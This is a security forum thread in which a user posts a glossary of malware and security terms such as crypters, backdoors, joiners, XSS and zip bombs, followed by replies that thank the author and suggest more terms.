Security Dictionary

Discussion in 'General Security Discussions' started by Cowpipe, Jun 26, 2014.

  1. Cowpipe

    Cowpipe New Member

    Jun 16, 2014
    #1 Cowpipe, Jun 26, 2014
    Last edited: Jul 19, 2014
    Hello, have tried to put together a wide array of terms that are used in the security community and may occasionally crop up on this forum without explanation. As with any author-written dictionary the definitions are infused with my own personal experience, also be aware that in trying to simplify some of the technical explanations I may have missed important information out, so let me know if that's the case.

    The list is pretty short so far, but I'm hoping if anybody has a term to add, or sees a definition I've got wrong, let me know either in a reply or in PM etc. For those of you not well-versed in the technical terms I hope this will be an interesting read :) I'll be working on adding new terms (a lot of obvious ones missing...), cleaning it up and generally improving it as my labour of love :p Hope you enjoy it

    1337: The leet spelling of leet.

    Adware: A program that is designed to present advertisements to you. These usually take the form of links being displayed on legitimate websites (for example, links to online pharmacies appearing on the usually ad-free Google homepage), pop ups and any software that appears to serve the sole purpose of extracting money from you. When people refer to BHOs and toolbars, they are normally referring to adware. Note that Scareware is classed by some as a type of adware.

    Anti-Malware: Software that specialises in removing malware and trojans from your computer. True anti-malware programs such as MalwareBytes Anti-Malware are different from Anti-Virus programs (See below)

    Anti-Spyware: The same as above, however specialises in removing spyware, which usually includes Adware and PUPs.

    Anti-Virus: Software that protects your computer from malicious software. There is much debate and confusion in the community about which anti-virus is the best, however it's often not fair to compare certain products. An anti-virus software is a more general program which aims to remove all known threats from your computer. Whereas some programs are more specialised, these include "anti-rootkit, anti-malware and anti-spyware"

    AV: Short for Anti-virus

    Backdoor: A program, normally called a trojan or 'server' designed to grant a hacker or operator access to your computer. The backdoor works by listening for special commands sent from the control program to your IP address, instructing the server portion to do anything from log passwords, record your webcam, take screen shots etc, depending on what abilities were programmed into the server. Note that server in this context refers to the actual malicious file on your computer and not to a 'server' on the internet. The hackers control panel is usually called a client.

    Binder: See Joiner

    Code: The word code is used almost exclusively in the underground community to refer to either the source code of a program, or as another word for program (to write a piece of code).

    Crypter: Also known as executable encrypters, the aim of a crypter in the hands of malicious parties is to obfuscate the contents of the file to prevent disassembly and debugging. Think of this as the difference between reading this sentence. And reading \[th]%@***+[is] se-&^nt20enc2008e2&21][*7. There are two forms of crypters, "Scan-Time" and "Run-Time", the latter is the most sought after as the executable code is protected in memory. In order to run an executables code has to be unpacked and loaded into memory, in it's unpacked state the code is vulnerable to attack as the analyst can simply make a copy of it, therefore run time crypters employ more advanced techniques to avoid this practise, known as 'dumping' (copying memory contents to a file). A scan time crypter simply protects until it is run, when it decrypts the malicious file into memory (or a temporary file on disk). Anti-virus scanners typically include modules to deal with these kinds of file by running them in a sandbox to scan the unprotected contents.

    Dropper: Normally called a Trojan Dropper, any file or code which downloads or 'drops' a file/s onto the users computer.

    Fork Bomb: A piece of code which is designed to continuously replicate itself until all the computers resources have been exhausted. For example a process which continually launches itself as a new process. Some zip bombs are also considered fork bombs, especially where they aim to unpack multiple layers of gigantic sized files, designed to exhaust all of the disk space or memory on your computer (whichever runs out first).

    FUD: Short for Fully Undetected or Fully Undetectable. Referring to a piece of malware meaning no anti-virus can currently detect it. See also UD and SUD.

    HEUR: Short for Heuristic. Refers to generic patterns which are matched against malware samples to indicate the likelihood that sample is malicious.

    Heuristic: As above.

    IM: Instant messenger, for example MSN Messenger or Windows Live Messenger.

    IRC: Internet Relay Chat. Private IRC chatrooms are popular amongst the underground community, normally hosted on private servers, multiple people can join a channel (individual chatroom) and talk at once.

    IRC Bot: A remote administration program which receives commands through an IRC channel.

    JS: Short for JavaScript

    JavaScript: A scripting language (see below) which is used to control the interactive (aka dynamic) features of a website. It is processed not by the server as with PHP but by your browser. Javascript viruses are not compiled and are therefore usually obfuscated to frustrate attempts to detect any malicious activity in plain site. As Javascript is interprited by the browser, it can also be run as a URL in the address bar. The user copies and pastes a code into their address bar, giving the javascript code access to anything on the webpage the user is browsing. This has been used prominently in the past on social media to cause users to automatically post malicious links to all of their friends profiles for example.

    Joiner: A program used to package together multiple files into a single file (or container). Typically used to package a backdoor with a legitimate file, so as when you run the legitimate program, the trojan is also extracted and run without your knowledge. See "stub" for details on how this works.

    New School: Used to describe a person belonging to the new generation of hackers and virus writers. The term is generally derogatory as it's thought most new schoolers are 'script kiddies'. Some people also include those hackers and virus writers who operate exclusively for money in this category.

    n00b/Newbie: A usually derogatory term used to describe someone inexperienced. n00bs are especially prone to annoying less tolerant members by asking what are often 'obvious' questions.

    Obfuscation: Unobfuscated code is normally fairly readable, allowing the analyst to 'follow along' and understand how the program operates. The point of obfuscation is to frustrate these attempts, whether to discourage stealing (ripping) or prevent malware researchers from detecting malicious activity.

    Oldskool: Used to describe a person who shares the attitude and culture of the early hackers and virus writers. The exact definition of this is generally a personal view, however the general consensus is that an 'oldskooler' is someone who obsessively seeks knowledge. An oldskooler will generally dissect a system to find it's weaknesses and will reward themselves by exploiting those weaknesses. Notoriety and demonstrating this knowledge is often part of the fun.

    Packer: Different from a crypter in that the main goal is not to protect against anti-viruses by encryption but simply to reduce the file size.

    Phishing: A fake website, program, email or application disguised as legitimate and used for the purpose of gaining personal information (usually passwords & bank account details) from the user. Lesser known phishing scams also affect the underground community (typically script kiddie hangouts), in the form of fake tools and programs. The mid 2000s saw an influx of fake "Freezers" and "booters" designed to steal usernames and passwords from IM services such as Yahoo and MSN.

    Popup: A popup or pop up ad can take three forms. Popup is used to describe an advert that opens in a new window or tab. Pop-over is used to describe an advert that appears right in front of the website itself, obscuring your view of it, these are often particularly difficult to close. And pop-under, which is used to describe an advert that appears behind any open webpages, the intention being that as you don't notice it right away, you will be more likely, on discovering it to stop, look and think "what's this" as opposed to closing another annoying pop-up without thinking.

    Rar Bomb: See Zip Bomb

    Ripper: Someone who steals code and passes it off as their own, usually with little modification other than replacing the authors name with their own.

    Root: Refers to an account with the highest possible privileges on a computer or server. Should a virus or hacker "get root" they can do pretty much anything they like.

    Leet: Referring either to "leet speak" meaning t0 r3pl4c3 l33t3r5 w1th numb3rs or referring to an especially skilled person "elite". Note that it is generally regarded by most as rather childish to label yourself as leet or elite, this behaviour is common amongst new schoolers.

    Scene: The scene is a name for the culture and collective of hackers and virus writers. Some people will refer specifically to a subsection, for example virus writers as the vx scene.

    Script Kiddie: Someone who is interested in writing viruses and spreading malicious code for fun and to cause mayhem and destruction but uninterested in how they work. Script kiddies almost exclusively use tools and kits to produce viruses, use pre-made RATs, password stealing kits and crypters. These people are also called skids & skiddies.

    Signature: An anti-virus signature is a small sequence of bytes (eg. the computers version of the alphabet) which can uniquely identify a malicious file. It can also refer to a hash (unique sequence of letters and numbers, like a fingerprint) which identifies either a whole malicious file, or just a portion of it (a particular 'section' in the executable file)

    Stub: Refers to a small executable in a crypter, packer or joiner that unpacks the main contents of the file. Usually a specific marker or 'offset' (pointer to a specific part of a file) tells the stub what data is to be loaded into memory or extracted to disk. For a visual example, imagine that || means the boundaries of a file (the container) and the @split@ is the end of the stub program and the beginning of the malicious program inside. ||[STUB DATA]@split@[FILE1 DATA]||

    SUD: Submission of Undetected (samples) Done, refers to submitting a file for analysis to anti-virus companies which do not currently detect the file as malicious.

    Trojan: Short for Trojan Horse. General term for a malicious program which does not have the ability to replicate. Trojans are normally sub-categorised according to their ability. For example a Trojan PSW will steal passwords whereas a Trojan Dropper will download malicious files to your computer.

    UD: Undetected or Undetectable, different from FUD in that some anti-virus programs may detect the file as malicious.

    Virus: A virus traditionally is any piece of malicious code that has the ability to infect other files on your computer. There are multiple types of viruses, known as prependers, appenders, inserters and over-writers. It was considered poor for a virus writer to produce an over-writer virus, that is one that simply replaces files on your computer with a copy of itself. Prependers and appenders attach the virus code (or a specific infection code, or sometimes just text), to the beginning of the file and the end of the file respectively. An inserter virus places it's code at a random position in the file. This technique is designed to reduce the possibility of detection by anti-virus and also to make file harder to disinfect (remove the virus code and restore the file to it's original state). These terms refer to the physical position of the code within the file, not to whether the virus runs before the main program or after as nearly all viruses patch the "original entry point" meaning the first piece of code to execute when you run the file becomes the viruses code, which will then decide whether to let the program continue as normal or not. Additionally viruses can also be considered 'polymorphic' or 'metamorphic', a polymorphic virus has the ability to change the order it's code is run, whereas a metamorphic virus can actually re-write it's code, becoming a 'technically different' virus from the point of view of an anti-virus. Both techniques were employed to frustrate attempts by anti-virus programs to detect and remove viruses.

    VX: Slang for virus.

    XSS: Cross site scripting. An attack whereby malicious commands (usually HTML or Javascript) are passed to a web server and executed. Client side XSS attacks require the attack to cause a user to copy and paste malicious code into the address bar, this code can add for example, a malicious iframe (a malicious website can be 'embedded' in the webpage you are viewing) without your knowledge. This form of attack usually relies on malicious input being passed to a PHP file on the server, for example the file can be replaced vulnerable.php?=[our code here] causing our code to execute if the input is not 'sanitized' or filtered properly (the ?= at the end of the php file means we can pass information to a file on the server, in the url). with Server side XSS means that the same malicious code can be "injected" into a webpage, for example a comment box that allows the use of certain HTML tags for example <b></b> to make text bold. If the comment box does not properly filter the content, we can include a <script> tag which allows us to run Javascript. Thereafter whenever another user views our comment on the page, the server will also load the Javascript, allowing for example, links to be spammed to us and much more.

    ZIP Bomb: A malicious Zip file which is designed to cause your computer or anti-virus to crash upon opening. Because of how the compression algorithms in a zip file work, repeated data for example "aaaaaaaaaaaaaaaaaaaa" can be dramatically reduced in size, meaning a file containing just repeated data over a terabyte in size can be compressed to as little as 40kb. Some Zip bombs employ a different approach and are crafted specifically to contain a second zip file within the first (zip in a zip), this second zip file does not however contain any further files, but instead a link back up to the top zip file, creating an endless loop. This technique is designed to cause anti-virus programs to crash when trying to unpack. Whilst the technique was popular many years ago, most modern anti-viruses contain counter-measures against these practises.

    Note: This list is currently quite small and random. I will add more terms in the next few days (as of 07/20/14)
  2. Malware1

    Malware1 New Member

    Sep 28, 2011
    I will correct SUD. It's Submission of Undetected (Samples) Done.

    Good article anyway. :)
    nissimezra, user and Cowpipe like this.
  3. Dani Santos

    Dani Santos From Xvirus

    Jun 3, 2014
    Windows 10
    Nice work and info!
    Malware1, Cowpipe and user like this.
  4. Cowpipe

    Cowpipe New Member

    Jun 16, 2014
    Thanks, couldn't remember the exact name but I new it was referring to new samples being submitted :)
    Malware1 and user like this.
  5. kmr1684

    kmr1684 Level 3

    Jun 23, 2014
    thanks, i can bookmark this page until or unless i need reference or i forgotten some of it in near future, thanks once again for taking time and energy to organize and sort it out in well versed manner. :)
    Malware1, Cowpipe and user like this.
  6. Cats-4_Owners-2

    Cats-4_Owners-2 Level 37

    Dec 4, 2013
    Southern California (east of Los Angeles)
    Windows 10
    I propose the term CowPipe, from this time forward, refer to malware that has been detected and thoroughly dispatched.
    Example: "Oh, my! My system's working like new!! He really CowPiped that infection!".:p:D
  7. King Mellow

    King Mellow Level 25

    Jun 21, 2013
    Manila, Philippines
    Windows 10
    Haha. You always making me laugh bro. :D
  8. Umbra

    Umbra Level 61
    Content Creator

    May 16, 2011
    Beta tester
    Europe > S-E Asia
    Windows 10
    very nice post.

    you can add :

    - Honeypot
    - Sniffer
    - Denial Of Service
    - Brute Force
    - Worm
    - steganography

    the list is long ;)
    Dirk41, LAGUN, user and 3 others like this.
  9. Cats-4_Owners-2

    Cats-4_Owners-2 Level 37

    Dec 4, 2013
    Southern California (east of Los Angeles)
    Windows 10
    #9 Cats-4_Owners-2, Jun 27, 2014
    Last edited: Jun 27, 2014
    "The list is long;)"
    ..and continues.:cool:

    RDV = Rendezvous!

    Let us not forget Umbra = Umbra Corp/Umbra Total Security & Master of The Dark Side of "CowPiping" none of which should be confused with the Italian name on the breast of my discount priced start-up jacket, "Umbr(-o)" which, in fact, has absolutely nothing whatsoever to do with computer system security;) ..unless, of course, I wrap one of our lap tops in it to act as a heat, dust, and fur barrier!:p:D

    PS (update) An example of the valuable info learned here: While watching the TV game show, Jeopardy, "Internet Billy Goats avoid this type of unpleasant creature whom lurks beneath bridges..",;) I was able to impress my wife with o_O"What is a Troll?"!!:D
  10. Chromatinfish 123

    May 26, 2014
    Canada/United States
    You forgot:
    A computer that generates zombie systems that attack other computers, to hide the real computer's identity.
    A group of computers that, well, infect other computers! It can be used with the developer's computer as the main controller or a more advanced hacker can use reflector computers to hide his/her identity (see Reflector). Each consumes a bit of bandwidth and CPU speed to form a mega-CPU and tons of bandwidth to infect other computers. Some hackers/developers do this solely for the fun of it, while others spy on the computer's info.
  11. Dani Santos

    Dani Santos From Xvirus

    Jun 3, 2014
    Windows 10
    People could suggest more and he could edit and add the suggestions. It's just an idea to make the dictionary bigger.
  12. Oxygen

    Oxygen Level 42

    Feb 23, 2014
    United States
    Windows 10
    This shall grow.
    Cowpipe likes this.
  13. Cowpipe

    Cowpipe New Member

    Jun 16, 2014
    You just reminded me, I need to update this :)
    Oxygen likes this.
  14. Behold Eck

    Behold Eck Level 9

    Jun 22, 2014
    Data bomb same as zip bomb.

    Regards Eck
    Cowpipe likes this.
  15. WinXPert

    WinXPert Level 24
    Trusted AV Tester

    Jan 9, 2013
    Graphic Artist
    Windows 7
    Qihoo 360
    all i can think of is clickjacker
  16. Arakasi

    Arakasi New Member

    Jul 12, 2014
    Network Admin, IT Specialist, Security Enthusiast
    San Antonio, TX
    Sitting here thinking of terms not in this list was fun.
    Enjoy, and don't hesitate to PM me if you need assistance with definitions, i have just given you a lot of work to do.
    I know for a fact you don't need me to tell you what these are though, hahahah

    Boot sector
    Boot sector virus
    Trojan downloader
    Boot sector virus
    Master boot record
    Volume boot record
    Command and control server
    Cowpipe likes this.
  17. Maximum

    Maximum New Member

    Dec 20, 2014
    This isn't a bad security dictionary you got here!
    Cats-4_Owners-2 likes this.
  18. Korora

    Korora New Member

    Jul 22, 2015
    United States
    This is a really cool posts!

    I even picked up on a few terms I haven't heard of before :)
    Behold Eck and Cats-4_Owners-2 like this.
  19. Mr. Tech

    Mr. Tech Guest

    Here are some you should consider adding to the list:
    HIPS - Host Intrusion Detection System
    BB - Behavior Blocker
    AM - Anti-Malware
    AE - Anti-Exploit or Anti-Executable
  20. willieaames

    willieaames New Member

    Sep 21, 2015
    San Fransisco
    very comprehensive, thanks for sharing...
Similar Threads Forum Date
SECURE Rainspell Security Config PC Security Configuration Today at 4:15 AM
RISKY faysalaltafmirza's Security Config PC Security Configuration Yesterday at 12:56 PM
Video Review ByPass Eset Internet Security 11 Video Reviews Friday at 4:19 PM
  • About Us

    Our community has been around since 2010, and we pride ourselves on offering unbiased, critical discussion among people of all different backgrounds about security and technology . We are working every day to make sure our community is one of the best.
  • Need Malware Removal Help?

    If you're being redirected from a site you’re trying to visit, seeing constant pop-up ads, unwanted toolbars or strange search results, your computer may be infected with malware. We offer free malware removal assistance to our members in the Malware Removal Assistance forum.
  • Quick Tip

    Without meaning to, you may click a link that installs malware on your computer. To keep your computer safe, only click links and downloads from sites that you trust. Don’t open any unknown file types, or download programs from pop-ups that appear in your browser.